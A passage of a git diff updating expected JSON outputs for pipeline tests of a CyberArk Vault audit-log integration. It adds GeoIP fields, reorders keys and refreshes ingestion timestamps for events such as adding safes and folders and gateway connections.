"ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -45,14 +38,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "update safe", - "ingested": "2021-12-09T13:36:39.071393700Z", + "ingested": "2021-12-14T14:42:02.948918854Z", "original": "\u003c5\u003e1 2021-03-10T18:15:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:15:44\",\"IsoTimestamp\":\"2021-03-10T18:15:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"181\",\"Desc\":\"Update Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Safe\",\"GatewayStation\":\"\"}}}", "code": "181", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json index 46671324d08..cec8dd3c1ec 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", 
@@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -45,28 +38,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add safe", - "ingested": "2021-12-09T13:36:39.177420800Z", + "ingested": "2021-12-14T14:42:03.079824324Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", "code": "185", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -82,6 +79,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -100,14 +102,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add safe", - "ingested": "2021-12-09T13:36:39.177430400Z", + "ingested": "2021-12-14T14:42:03.079826746Z", "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e185\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", "code": "185", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json index 2d423ba5584..dc04a334c84 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -52,7 +61,7 @@ "event": { "severity": 2, "action": "add folder", - "ingested": "2021-12-09T13:36:39.355913600Z", + "ingested": "2021-12-14T14:42:03.328659568Z", "original": "\u003c5\u003e1 2021-03-10T09:11:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:40\",\"IsoTimestamp\":\"2021-03-10T09:11:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"Root\\\\Scripts\\\\\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", "code": "187", "kind": "event" 
@@ -111,7 +120,7 @@ "event": { "severity": 2, "action": "add folder", - "ingested": "2021-12-09T13:36:39.355922200Z", + "ingested": "2021-12-14T14:42:03.328662637Z", "original": "\u003c5\u003e1 2021-03-11T18:01:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:01:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:01:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e187\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Folder\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Folder\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMUnmanagedSessionAccounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\2\\\\\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Folder\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:01:14\",\"IsoTimestamp\":\"2021-03-11T18:01:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Add 
Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMUnmanagedSessionAccounts\",\"File\":\"Root\\\\2\\\\\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", "code": "187", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json index 77fb6481866..7a6854477bd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json @@ -66,7 +66,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546289100Z", + "ingested": "2021-12-14T14:42:03.559587239Z", "original": "\u003c5\u003e1 2021-03-08T18:07:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:07:51\",\"IsoTimestamp\":\"2021-03-08T18:07:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", 
@@ -97,10 +97,19 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "PVWAGWUser" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -149,7 +158,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546293100Z", + "ingested": "2021-12-14T14:42:03.559590026Z", "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -180,10 +189,19 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "PVWAGWUser" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -232,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546296400Z", + "ingested": "2021-12-14T14:42:03.559590480Z", "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -314,7 +332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546301900Z", + "ingested": "2021-12-14T14:42:03.559590918Z", "original": "\u003c5\u003e1 2021-03-10T08:31:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:31:50\",\"IsoTimestamp\":\"2021-03-10T08:31:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", 
@@ -397,7 +415,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546306600Z", + "ingested": "2021-12-14T14:42:03.559591390Z", "original": "\u003c5\u003e1 2021-03-10T22:37:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:37:00\",\"IsoTimestamp\":\"2021-03-10T22:37:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.10\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -421,10 +439,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "source": { 
@@ -481,7 +508,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546311200Z", + "ingested": "2021-12-14T14:42:03.559591804Z", "original": "\u003c5\u003e1 2021-03-11T17:38:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:05\",\"IsoTimestamp\":\"2021-03-11T17:38:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 
Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "19", "kind": "event", @@ -505,10 +532,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "source": { 
@@ -565,7 +601,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546316700Z", + "ingested": "2021-12-14T14:42:03.559592226Z", "original": "\u003c5\u003e1 2021-03-11T17:48:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:22\",\"IsoTimestamp\":\"2021-03-11T17:48:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 
Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "19", "kind": "event", @@ -596,10 +632,19 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", "user": { "name": "PVWAGWUser" }, - "address": "67.43.156.14", "ip": "67.43.156.14" }, "tags": [ 
@@ -649,7 +694,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546322Z", + "ingested": "2021-12-14T14:42:03.559592629Z", "original": "\u003c5\u003e1 2021-03-11T18:02:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:02:57\",\"IsoTimestamp\":\"2021-03-11T18:02:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 
Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -673,17 +718,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "Administrator" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "PSMPGW_SSH" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -733,7 +796,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:39.546327300Z", + "ingested": "2021-12-14T14:42:03.559593038Z", "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n 